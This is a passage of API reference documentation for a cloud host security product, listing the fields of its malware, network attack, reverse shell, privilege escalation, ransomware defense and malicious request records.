Domain | String | Domain name |
Mark | String | Remarks |
CreateTime | String | Creation time |
ModifyTime | String | Update time |
Malicious file details
Used by actions: DescribeMalwareInfo.
Name | Type | Description |
---|---|---|
VirusName | String | Virus name |
FileSize | Integer | File size |
MD5 | String | File MD5 |
FilePath | String | File address |
FileCreateTime | String | First running time |
FileModifierTime | String | Last running time |
HarmDescribe | String | Severity description |
SuggestScheme | String | Recommended solution |
ServersName | String | Server name |
HostIp | String | Server IP |
ProcessName | String | Process name |
ProcessID | String | Process ID |
Tags | Array of String | Tag Features |
Breadth | String | Impact breadth // Not provided currently Note: This field may return null, indicating that no valid values can be obtained. |
Heat | String | Search popularity // Not provided currently Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Unique ID |
FileName | String | File name |
CreateTime | String | First detection time |
LatestScanTime | String | Last scan time |
Reference | String | Reference link |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: executed commands; ssh_service: SSH service IP; ssh_source: log-in source. Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Online status of a host: OFFLINE and ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status. 4: pending; 5: trusted; 6: isolated. Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical. Note: This field may return null, indicating that no valid values can be obtained. |
CheckPlatform | String | Trojan detection platforms, separated with commas. 1: cloud security engine; 2: TAV; 3: BinaryAI; 4: abnormal behavior; 5: threat intelligence. Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
StrFileAccessTime | String | Last access time Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
List of information on malicious file risks
Used by actions: DescribeMalwareRiskWarning.
Name | Type | Description |
---|---|---|
MachineIp | String | Machine IP |
VirusName | String | Virus name |
CreateTime | String | Detection time |
Id | Integer | Unique ID |
File Scan Overview Information
Used by actions: DescribeMalwareRiskOverview.
Name | Type | Description |
---|---|---|
HostCount | Integer | Number of affected hosts |
ProcessCount | Integer | Exceptional Process Count |
FileCount | Integer | Number of Malicious Files |
IsFirstScan | Boolean | Whether it is the first scan. false: no; true: yes. |
ScanTime | String | Last scan time |
Number of events hitting allowlists
Used by actions: DescribeMalwareWhiteListAffectList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
HostIp | String | Host IP |
Md5 | String | Affected MD5 |
FilePath | String | File path |
CreateTime | String | Time added |
Trojan allowlist information
Used by actions: DescribeMalwareWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
QuuidList | String | CVM QUUID (Separate multiple items with commas.) |
Md5List | String | MD5 list (Separate multiple items with commas.) |
IsGlobal | Integer | Whether the rule applies to all hosts: 0 - no; 1 - yes |
Mode | Integer | Allowlist mode: 0 - MD5; 1 - customization |
MatchType | Integer | Match mode: 0 - precise match; 1 - fuzzy match |
FileName | String | File name (Separate multiple items with commas.) |
FileDirectory | String | File directory (Separate multiple items with commas.) |
FileExtension | String | File suffix (Separate multiple items with commas.) |
CreateTime | String | Rule creation time |
EventsCount | Integer | Affected records |
Expert service - monthly inspection report
Used by actions: DescribeMonthInspectionReport.
Name | Type | Description |
---|---|---|
ReportName | String | Inspection report name |
ReportPath | String | Inspection report download link |
ModifyTime | String | Inspection report update time |
Network attack event
Used by actions: DescribeAttackEvents.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
DstPort | Integer | Target port |
SrcIP | String | Source IP |
Location | String | Source location |
VulId | Integer | Vulnerability ID |
VulName | String | Vulnerability name |
MergeTime | String | Attack time |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Attack Status. 0: Attack Attempt; 1: Confirmed Attack (Successful Attack). |
Status | Integer | Processing Status. 0: Pending; 1: Processed; 2: Allowlisted; 3: Ignored; 4: Deleted; 5: Defense Enabled. |
VulSupportDefense | Integer | Whether vulnerabilities support defense. 0: No; 1: Yes |
VulDefenceStatus | Integer | Whether to enable vulnerability defense. 0: No; 1: Yes |
PayVersion | Integer | Machine payment edition. 0: Basic Edition; 1: Professional Edition; 2: Premium Edition; 3: General Discount Edition |
Quuid | String | CVM UUID |
Count | Integer | Attacks |
New | Boolean | Whether to add new hosts today |
Details of Network Attack Events
Used by actions: DescribeAttackEventInfo.
Name | Type | Description |
---|---|---|
Status | Integer | Processing Status. 0: Pending; 1: Processed; 2: Allowlisted; 3: Ignored; 4: Deleted; 5: Defense Enabled. |
SrcIP | String | Attack source IP address |
Location | String | Attack Source |
VulName | String | Vulnerability name |
VulId | Integer | Vulnerability ID |
CVEId | String | Vulnerability CVE ID |
AttackLevel | Integer | Vulnerability attack level |
VulDefenceStatus | Integer | Vulnerability Defense Status. 0: Disabled; 1: Enabled. |
VulSupportDefense | Integer | Whether vulnerabilities support defense. 0: No; 1: Yes |
SvcPs | String | Service Process Base64 |
NetPayload | String | Attack packet |
AbnormalAction | String | Abnormal behavior |
Uuid | String | Host UUID |
Id | Integer | Event ID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Integer | Target port |
Count | Integer | Attack count |
PayVersion | Integer | Machine payment edition. 0: Basic Edition; 1: Professional Edition; 2: Premium Edition; 3: General Discount Edition |
Quuid | String | CVM UUID Note: This field may return null, indicating that no valid values can be obtained. |
MergeTime | String | Time of Attack Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | 0: Attack Attempt; 1: Successful Attack Note: This field may return null, indicating that no valid values can be obtained. |
HostOpType | Integer | 0: No Compromised Behavior; 1: RCE (command execution); 2: Dnslog; 3: Writefile Note: This field may return null, indicating that no valid values can be obtained. |
HostOpProcessTree | String | Process tree, Base64-encoded; decode before use. Note: This field may return null, indicating that no valid values can be obtained. |
Statistics on top network attacks
Used by actions: DescribeAttackTop.
Name | Type | Description |
---|---|---|
Agent | Array of TopInfo | Top Statistical Data on Network Attack Host Dimension Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | Array of TopInfo | Top Statistical Data on Network Attack IP Source Dimension Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Array of TopInfo | Top Statistical Data on Network Attack Target Port Dimension Note: This field may return null, indicating that no valid values can be obtained. |
Vul | Array of TopInfo | Top Statistical Data on Network Attack Vulnerability Dimension Note: This field may return null, indicating that no valid values can be obtained. |
Attack trend statistics
Used by actions: DescribeAttackTrends.
Name | Type | Description |
---|---|---|
DateTime | String | Time Point, e.g., 2023-05-06 Note: This field may return null, indicating that no valid values can be obtained. |
AttackCount | Integer | Number of attacks Note: This field may return null, indicating that no valid values can be obtained. |
TryAttackCount | Integer | Attack Attempts Note: This field may return null, indicating that no valid values can be obtained. |
SuccAttackCount | Integer | Attack Success Count Note: This field may return null, indicating that no valid values can be obtained. |
Network attack allowlist rules
Used by actions: DescribeNetAttackWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Rule description Note: This field may return null, indicating that no valid values can be obtained. |
Scope | Integer | 0: a group of QUUIDs; 1: all hosts. Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | Whether to process previous events: 0: do not process; 1: process Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | String | Host QUUIDs, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
SrcIP | String | Source IP. Single IP: 1.1.1.1; IP range: 1.1.1.1-1.1.2.1; IP range in CIDR notation: 1.1.1.0/24. Separate multiple entries with semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Modification time Note: This field may return null, indicating that no valid values can be obtained. |
Port statistics list
Used by actions: DescribeOpenPortStatistics.
Name | Type | Description |
---|---|---|
Port | Integer | Port number |
MachineNum | Integer | Number of Hosts |
Order Modification Parameter Object
Used by actions: CreateLicenseOrder.
Name | Type | Required | Description |
---|---|---|---|
ResourceId | String | No | Resource ID |
NewSubProductCode | String | No | New Product Identification. PRO_VERSION: Professional Edition; FLAGSHIP: Premium Edition |
InquireNum | Integer | No | Scale-up/Scale-down Count, which is ignored for reconfiguration sub-product |
Order resources
Used by actions: CreateWhiteListOrder.
Name | Type | Description |
---|---|---|
Id | Integer | Resource primary key ID |
ResourceId | String | Resource ID |
BeginTime | String | Start time |
EndTime | String | Expiration time |
LicenseType | Integer | Authorization type |
Operating System Name
Used by actions: DescribeMachineOsList.
Name | Type | Description |
---|---|---|
Name | String | System name |
MachineOSType | Integer | Operating system type enumeration value |
Log-in location information
Used by actions: AddLoginWhiteLists, DescribeLoginWhiteCombinedList, DescribeLoginWhiteList, ModifyLoginWhiteInfo, ModifyLoginWhiteRecord.
Name | Type | Required | Description |
---|---|---|---|
CityId | Integer | Yes | City ID |
ProvinceId | Integer | Yes | Province ID |
CountryId | Integer | Yes | Country ID. Currently, only 1 is supported, indicating China. |
Location | String | No | Location name |
Local privilege escalation data
Used by actions: DescribePrivilegeEventInfo.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | Yunjing ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Execute commands |
UserName | String | Username |
UserGroup | String | User group |
ProcFilePrivilege | String | Process file permission |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process username |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: executed command; ssh_service: SSH service IP; ssh_source: log-in source |
Status | Integer | Processing status: 0: pending; 2: allowlisted; 3: processed; 4: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Machine name |
SuggestScheme | String | Recommended solution |
HarmDescribe | String | Hazard description information |
Tags | Array of String | Tag |
References | Array of String | Reference link |
MachineWanIp | String | Host public IP address |
NewCaps | String | Permission list (Separate multiple items with |.) |
MachineStatus | String | Host online status: OFFLINE; ONLINE |
ModifyTime | String | Processing time |
Local privilege escalation rule
Used by actions: DescribePrivilegeRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
ProcessName | String | Process name |
SMode | Integer | Whether the mode is S mode |
Operator | String | Operator |
IsGlobal | Integer | Whether the rule is global |
Status | Integer | Status. 0: valid; 1: invalid. |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Process statistics data
Used by actions: DescribeProcessStatistics.
Name | Type | Description |
---|---|---|
ProcessName | String | Process name |
MachineNum | Integer | Number of hosts |
Product trial status query API Data output parameter
Used by actions: DescribeProductStatus.
Name | Type | Description |
---|---|---|
FWUserStatus | Integer | Protection status. 1: unprotected; 2: protecting; 3: in trial; 4: expired |
CanApplyTrial | Boolean | Whether application for trial is available. True indicates yes. |
CanNotApplyReason | String | Reason for unavailable trial (Leave it blank if the trial is available.) |
LastTrialTime | String | Last trial end time (Leave it blank if no trial record exists.) |
List of host snapshot backup
Used by actions: DescribeRansomDefenseBackupList.
Name | Type | Description |
---|---|---|
BackupTime | String | Backup time |
EventStatus | Integer | Ransom Status: 0 - No Alarm, 1 - Alarm Present |
BackupStatus | Integer | Backup Status: 0 - Backing up, 1 - Normal, 2, 3 - Failed, 4 - Snapshot expired, 9 - Snapshot deleted |
DiskCount | Integer | Number of backup disks |
Disks | String | Hard Disk Information, separated by semicolons (;). |
SnapshotIds | String | Snapshot List, separated by semicolons (;) |
StrategyId | Integer | Policy ID |
StrategyStatus | Integer | Policy Status: 0 Disabled, 1 Enabled, 9 Deleted |
StrategyName | String | Policy name |
Prevention of Ransomware, Bait and Tamper Events
Used by actions: DescribeRansomDefenseEventsList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
Uuid | String | Host UUID |
Quuid | String | CVM UUID |
HostName | String | Host name |
Status | Integer | Event Status: 0-Pending, 1-Processed, 2-Trusted, 3-In Process, 4-Backup Resumed |
BaitFilePath | String | Tampered File Path |
FilePath | String | Malicious File Path |
Pid | Integer | Malicious Process ID |
PidParam | String | Malicious Process Parameters |
FileSize | Integer | Malicious File Size |
FileMd5 | String | Malicious File MD5 |
Type | Integer | Event Type: 0 Encrypted Ransom, 1 File Tampering |
CreateTime | String | Event Sending Time |
InstanceId | String | CVM Instance ID |
ModifyTime | String | Event modification time |
StrategyId | Integer | Policy ID |
StrategyName | String | Policy name |
HostIp | String | Host public IP address |
WanIp | String | Host Intranet IP |
PsTree | String | Process tree (Base64-encoded JSON) |
ProcessStartTime | String | Process startup time |
SnapshotNum | Integer | Number of Snapshot Backups Owned by the Host |
Anti-ransomware rollback task
Used by actions: DescribeRansomDefenseRollBackTaskList.
Name | Type | Description |
---|---|---|
Id | Integer | Task ID |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
Status | Integer | Rollback Task Status: 0 - In Progress, 1 - Succeeded, 2 - Failed |
Disks | String | Hard drive ID list, separated by semicolons (;) |
CreateTime | String | Operation time |
BackupTime | String | Snapshot time |
ModifyTime | String | Completion time; valid when Status is not 0. |
RegionInfo | RegionInfo | Availability zone information |
The TagList node in the data HostList corresponding to the host list query API
Used by actions: DescribeRansomDefenseStrategyList.
Name | Type | Description |
---|---|---|
Id | Integer | Policy ID |
Uin | String | Operating UIN Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name |
Description | String | Policy Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Enabling Status: 0 Disabled, 1 Enabled. |
IsAll | Integer | Whether it takes effect for all hosts. |
IncludeDir | String | Included directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
ExcludeDir | String | Excluded directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
BackupType | Integer | Backup pattern: 0 weekly, 1 daily. Note: This field may return null, indicating that no valid values can be obtained. |
Weekday | String | Backup days in a week (1-7): 1; 2; 3; 4. Note: This field may return null, indicating that no valid values can be obtained. |
Hour | String | Backup Execution Time Point (0-23): 11:00; 12:00 |
SaveDay | Integer | Storage Days, 0 for Permanent |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
MachineCount | Integer | Number of Bound Machines Note: This field may return null, indicating that no valid values can be obtained. |
The TagList node in the data HostList corresponding to the host list query API
Used by actions: DescribeRansomDefenseStrategyDetail.
Name | Type | Description |
---|---|---|
Id | Integer | Policy ID |
Uin | String | Operating UIN Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name |
Description | String | Policy Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Enabling Status: 0 Disabled, 1 Enabled. |
IsAll | Integer | Whether it takes effect for all hosts. |
IncludeDir | String | Included directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
ExcludeDir | String | Excluded directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
BackupType | Integer | Backup pattern: 0 weekly, 1 daily. Note: This field may return null, indicating that no valid values can be obtained. |
Weekday | String | Backup days in a week (1-7): 1; 2; 3; 4. Note: This field may return null, indicating that no valid values can be obtained. |
Hour | String | Backup Execution Time Point (0-23): 11:00; 12:00 |
SaveDay | Integer | Storage Days, 0 for Permanent |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
MachineCount | Integer | Number of Bound Machines Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Policy Associated Event Count Note: This field may return null, indicating that no valid values can be obtained. |
Details of Host Backup Bound to Anti-Ransomware Policy
Used by actions: DescribeRansomDefenseMachineList.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
InstanceId | String | Host Instance ID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tag | Cloud tag Note: This field may return null, indicating that no valid values can be obtained. |
RegionInfo | RegionInfo | Availability zone information Note: This field may return null, indicating that no valid values can be obtained. |
Tag | Array of MachineTag | CWPP tag Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Protection status: 0 Disabled, 1 Enabled. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID. 0 indicates no binding to any policy. Note: This field may return null, indicating that no valid values can be obtained. |
DiskInfo | String | Hard disk information in the format diskId1|diskName1;diskId2|diskName2. When left blank, all hard disks take effect. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
BackupCount | Integer | Number of Backups Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupStatus | Integer | Latest Backup Status: 0 - Backing Up, 1 - Normal, 2 - Failed, 9 - No Backup Yet Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupMessage | String | Reason for the Last Backup Failure Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupTime | String | Last Backup Time Note: This field may return null, indicating that no valid values can be obtained. |
RollBackPercent | Integer | Latest Rollback Progress Percentage Note: This field may return null, indicating that no valid values can be obtained. |
RollBackStatus | Integer | Latest Rollback Status: 0 - In Progress, 1 - Succeeded, 2 - Failed Note: This field may return null, indicating that no valid values can be obtained. |
BackupSuccessCount | Integer | Backup Success Count Note: This field may return null, indicating that no valid values can be obtained. |
Anti-Ransomware Host List
Used by actions: DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
InstanceId | String | Host Instance ID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tag | Cloud tag Note: This field may return null, indicating that no valid values can be obtained. |
RegionInfo | RegionInfo | Availability zone information Note: This field may return null, indicating that no valid values can be obtained. |
Tag | Array of MachineTag | CWPP tag Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Protection status: 0 Disabled, 1 Enabled. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID. 0 indicates no binding to any policy. Note: This field may return null, indicating that no valid values can be obtained. |
DiskInfo | String | Hard disk information in the format diskId1|diskName1;diskId2|diskName2. When left blank, all hard disks take effect. Note: This field may return null, indicating that no valid values can be obtained. |
HostVersion | Integer | Edition information. 0: Basic Edition; 1: Pro Edition; 2: Ultimate Edition; 3: Inclusive Edition. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Anti-Ransomware Machine Hard Disk Configuration
Used by actions: CreateRansomDefenseStrategy.
Name | Type | Required | Description |
---|---|---|---|
Uuid | String | Yes | Host UUID |
DiskInfo | String | No | Specified hard disk list in the format disk_id1|disk_name1;disk_id2|disk_name2. When it is empty, it means all hard disks. Note: This field may return null, indicating that no valid values can be obtained. |
Client Exception Information Structure
Used by actions: DescribeClientException.
Name | Type | Description |
---|---|---|
HostIP | String | Host IP |
InstanceID | String | Host Instance ID |
OfflineTime | String | Client Offline Time |
UninstallTime | String | Client Uninstallation Time |
UninstallCmd | String | Client Uninstallation Call Chain |
Uuid | String | Client UUID |
Region information
Used by actions: DescribeMachineRegionList, DescribeMachineRegions, DescribeMachines, DescribeMachinesSimple, DescribeRansomDefenseMachineList, DescribeRansomDefenseRollBackTaskList, DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Region | String | Region identifiers, such as ap-guangzhou, ap-shanghai, and ap-beijing |
RegionName | String | Chinese name of a region, such as South China (Guangzhou), East China (Shanghai Finance), and North China (Beijing) |
RegionId | Integer | Region ID |
RegionCode | String | Region code, such as gz, sh, and bj |
RegionNameEn | String | English name of the region |
Details of the region list
Used by actions: DescribeMachineRegionList.
Name | Type | Description |
---|---|---|
MachineType | String | Machine type. CVM: Tencent Cloud Virtual Machine; LH: TencentCloud Lighthouse; ECM: Tencent Cloud Edge Computing Machine; BM: Tencent BM 1.0; Other: other servers (non-Tencent Cloud). Note: This field may return null, indicating that no valid values can be obtained. |
CloudFrom | Integer | 0: Tencent Cloud; 1: IDC; 2: Alibaba Cloud; 3: Huawei Cloud; 4: Amazon; 5: Microsoft; 6: Google; 7: Oracle; 8: Digital Ocean. Note: This field may return null, indicating that no valid values can be obtained. |
RegionList | Array of RegionInfo | List of regions Note: This field may return null, indicating that no valid values can be obtained. |
Region information
Used by actions: DescribeBanRegions.
Name | Type | Description |
---|---|---|
RegionName | String | Region name |
ZoneSet | Array of ZoneInfo | AZ information |
Reverse Shell data
Used by actions: DescribeReverseShellEvents.
Name | Type | Description |
---|---|---|
Id | Integer | ID primary key |
Uuid | String | CWPP UUID |
Quuid | String | Server ID |
Hostip | String | Host private IP address |
DstIp | String | Target IP |
DstPort | Integer | Target port |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Command details |
UserName | String | Executing user |
UserGroup | String | Executing user group |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process user |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
Status | Integer | Processing status: 0 - pending; 2 - allowlisted; 3 - processed; 4 - ignored |
CreateTime | String | Occurrence time |
MachineName | String | Server name |
ProcTree | String | Process tree |
DetectBy | Integer | Detection method: 0: behavior analysis; 1: command feature detection |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Pid | Integer | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Threat level: 0 - medium-risk; 1 - high-risk Note: This field may return null, indicating that no valid values can be obtained. |
Reverse Shell data details
Used by actions: DescribeReverseShellEventInfo.
Name | Type | Description |
---|---|---|
Id | Integer | ID primary key |
Uuid | String | Yunjing UUID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
DstIp | String | Target IP |
DstPort | Integer | Target port |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Command details |
UserName | String | User for execution |
UserGroup | String | User group for execution |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process user |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
Status | Integer | Processing status: 0: pending; 2: allowlisted; 3: processed; 4: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
DetectBy | Integer | Detection method |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: executed command; ssh_service: SSH service IP; ssh_source: log-in source. Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution |
HarmDescribe | String | Description |
Tags | Array of String | Tag |
References | Array of String | Reference link |
MachineWanIp | String | Host public IP address |
MachineStatus | String | Host online status: OFFLINE; ONLINE |
ModifyTime | String | Processing time |
Reverse Shell rule
Used by actions: DescribeReverseShellRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
ProcessName | String | Process name |
DestIp | String | Target IP |
DestPort | String | Target port |
Operator | String | Operator |
IsGlobal | Integer | Whether the rule is global |
Status | Integer | Status (0: valid; 1: invalid) |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Malicious request event
Used by actions: DescribeRiskDnsEventInfo, DescribeRiskDnsEventList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
PolicyId | Integer | Policy ID |
PolicyType | Integer | Type of hit policy [-1: unknown|0: system|1: user] |
PolicyName | String | Name of hit policy |
ProtectLevel | Integer | Protection level [0: basic edition|1: professional edition|2: ultimate edition] |
HostId | String | Server ID |
HostName | String | Host name |
HostIp | String | Host IP |
WanIp | String | Public IP address |
AgentId | String | Client ID |
Domain | String | Access domain name |
Tags | Array of String | Tag Features |
AccessCount | Integer | Access count |
ThreatDesc | String | Threat description |
SuggestSolution | String | Fixing solution |
ReferenceLink | String | Reference link |
HandleStatus | Integer | Processing status [0: pending|2: allowlisted|3: untrusted status|4: processed|5: ignored] |
Pid | Integer | Process ID |
ProcessName | String | Process name |
ProcessMd5 | String | Process MD5 |
CmdLine | String | Command line |
FirstTime | String | First access time |
LastTime | String | Last access time |
HostStatus | String | Host online status [OFFLINE: offline|ONLINE: online|UNKNOWN: unknown] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
OsType | Integer | [1:CentOS|2:Debian|3:Gentoo|4:Redhat|5:Ubuntu|6:Windows|7:TencentOS|8:CoreOS|9:FreeBSD|10:SUSE] |
Malicious request list
Used by actions: DescribeRiskDnsInfo, DescribeRiskDnsList.
Name | Type | Description |
---|---|---|
Url | String | External access domain name |
AccessCount | Integer | Access count |
ProcessName | String | Process name |
ProcessMd5 | String | Process MD5 |
GlobalRuleId | Integer | Whether the rule is global. 0: no; 1: yes. |
UserRuleId | Integer | User rule ID |
Status | Integer | Status. 0: pending; 2: added to allowlist; 3: untrusted; 4: processed; 5: ignored. |
CreateTime | String | First access time |
MergeTime | String | Last access time |
Quuid | String | Unique QUUID |
HostIp | String | Host IP |
Alias | String | Alias |
Description | String | Description |
Id | Integer | Unique ID |
Reference | String | Reference |
CmdLine | String | Command line |
Pid | Integer | Process ID |
Uuid | String | UUID |
SuggestScheme | String | Recommended solution |
Tags | Array of String | Tag Features |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status. OFFLINE: offline; ONLINE: online; UNKNOWN: unknown. Note: This field may return null, indicating that no valid values can be obtained. |
Malicious request policy
Used by actions: DescribeRiskDnsPolicyList, ModifyRiskDnsPolicy.
Name | Type | Required | Description |
---|---|---|---|
PolicyName | String | Yes | Policy name |
PolicyType | Integer | Yes | Policy type [0: system; 1: user] |
PolicyAction | Integer | Yes | Policy action [0: alarm; 1: allow; 2: intercept + alarm] |
HostScope | Integer | Yes | Host range [1: all Professional + Ultimate Editions|2: all Ultimate Editions|0: partial hosts] |
HostIds | Array of String | Yes | Host ID |
Domains | Array of String | Yes | Domain name (when used as an input parameter, it must be Base64-encoded.) |
IsEnabled | Integer | Yes | Whether the policy is effective [0: effective; 1: not effective] |
PolicyId | Integer | No | Policy ID |
PolicyDesc | String | No | Policy description |
IsDealOldEvent | Integer | No | Whether to process previous events [0: no|1: yes] |
UpdateTime | String | No | Update time |
EventId | Integer | No | Event ID |
Abnormal Process Event
Used by actions: DescribeRiskProcessEvents.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID |
HostName | String | Host name |
HostIp | String | Host IP |
WanIp | String | Public IP address |
ProcessId | Integer | Process ID |
FilePath | String | File path |
CmdLine | String | Executed commands |
StartTime | String | Process startup time |
DetectTime | String | Last detection time |
VirusName | String | Virus name |
CheckPlatform | Array of String | Trojan detection platform [1: Cloud search engine | 2: TAV | 3: Binary AI | 4: Abnormal behavior | 5: Threat intelligence] |
VirusTags | Array of String | Virus tag |
ThreatDesc | String | Threat description |
SuggestSolution | String | Recommended solution |
ReferenceLink | String | Reference link |
HandleStatus | Integer | Processing status [0: Pending; 1: Processed; 2: Scanning; 3: Scanned; 4: Exited; 5: Ignored] |
OnlineStatus | Integer | Host Online Status |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID |
Index Rule
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
FullText | FullTextInfo | Full-text index configurations |
KeyValue | KeyValueInfo | Key-value index configurations |
Tag | KeyValueInfo | Meta field index configuration |
List of scan task details
Used by actions: DescribeScanTaskDetails.
Name | Type | Description |
---|---|---|
HostIp | String | Server IP |
HostName | String | Server name |
OsName | String | Operating system |
RiskNum | Integer | Number of risks |
ScanBeginTime | String | Scan start time |
ScanEndTime | String | Scan end time |
Uuid | String | UUID |
Quuid | String | QUUID |
Status | String | Status code |
Description | String | Description |
Id | Integer | Unique ID |
FailType | Integer | Failure details |
MachineWanIp | String | Public IP address |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Attack hot spots across the entire network on the large screen
Used by actions: DescribeScreenAttackHotspot.
Name | Type | Description |
---|---|---|
EventName | String | Event name |
SrcIp | String | Attacker IP address |
DstIp | String | Victim IP address |
Region | String | Region |
CreatedTime | String | Time |
Large screen baseline information
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
CategoryId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
BaselineFailCount | Integer | Baseline check items with risks Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
Visualized security report on the large screen
Used by actions: DescribeScreenBroadcasts.
Name | Type | Description |
---|---|---|
Title | String | Security report article title |
Level | Integer | Severity level of security report article: 0: none; 1: critical; 2: high-risk; 3: medium-risk; 4: low-risk |
Time | String | Release time |
Id | Integer | Article ID |
Network attack logs on the large screen
